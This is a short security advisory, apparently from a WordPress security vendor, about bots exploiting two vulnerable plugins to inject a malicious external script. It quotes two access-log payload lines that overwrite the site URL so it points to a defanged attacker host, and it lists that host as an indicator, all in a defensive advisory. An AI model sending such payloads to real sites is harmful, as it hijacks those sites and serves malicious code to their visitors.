Plugins Added to Malicious Campaign

  • April 25, 2019
Core Integrity Checksum for WordPress

We continue to see an increase in the number of plugins attacked as part of a campaign that’s been active for quite a long time. Bad actors have added more vulnerable plugins to inject similar malicious scripts.

Plugins Added to the Attack

  • Download WP Inventory Manager (version <= 1.8.2)
  • Woocommerce User Email Verification.  (version <= 3.3.0  **Still Not Fixed**)

Attackers are trying to exploit vulnerable versions of these plugins. Public exploits already exist for all of the components listed above, and we highly encourage you to keep your software up to date to prevent any infection.

Payloads Used by Bots

  • Download WP Inventory Manager  
51.15.147.147 - action=save&siteurl=hxxps%3A%2F%2Fcdn.deliverymoretimes[.]info%2Fcdn.js%3Fty%3D1%26 [25/Apr/2019:05:14:28 +0000] "POST /wp-admin/admin-post.php?page=wpim_manage_settings HTTP/1.1" 200 5 "-" "-"
  • Woocommerce User Email Verification
51.15.147.147 - wuev_form_type=siteurl&hxxps://cdn.deliverymoretimes[.]info/simpletype.js?ty=1& [25/Apr/2019:05:14:28 +0000] "POST /wp-admin/admin-post.php HTTP/1.1" 200 5 "-" "-"

Malicious Domains Injected So far

hxxps://cdn[.]deliverymoretimes[.]info/simpletype[.]js?ty=1

As always, we recommend adding a WAF as a second layer of protection. If you are using the plugin Woocommerce User Email Verification, it should be removed since the developer hasn’t fixed the “arbitrary options update”.

John Castro is Sucuri's Vulnerability Researcher who joined the company in 2015. His main responsibilities include threat intelligence and vulnerability analysis. John's professional experience covers more than a decade of pentesting, vulnerability research and malware analysis. When John isn't working with WordPres plugin vulnerabilities, you might find him hiking or hunting for new restaurants. Connect with him on LinkedIn

Related Tags
Related Categories
You May Also Like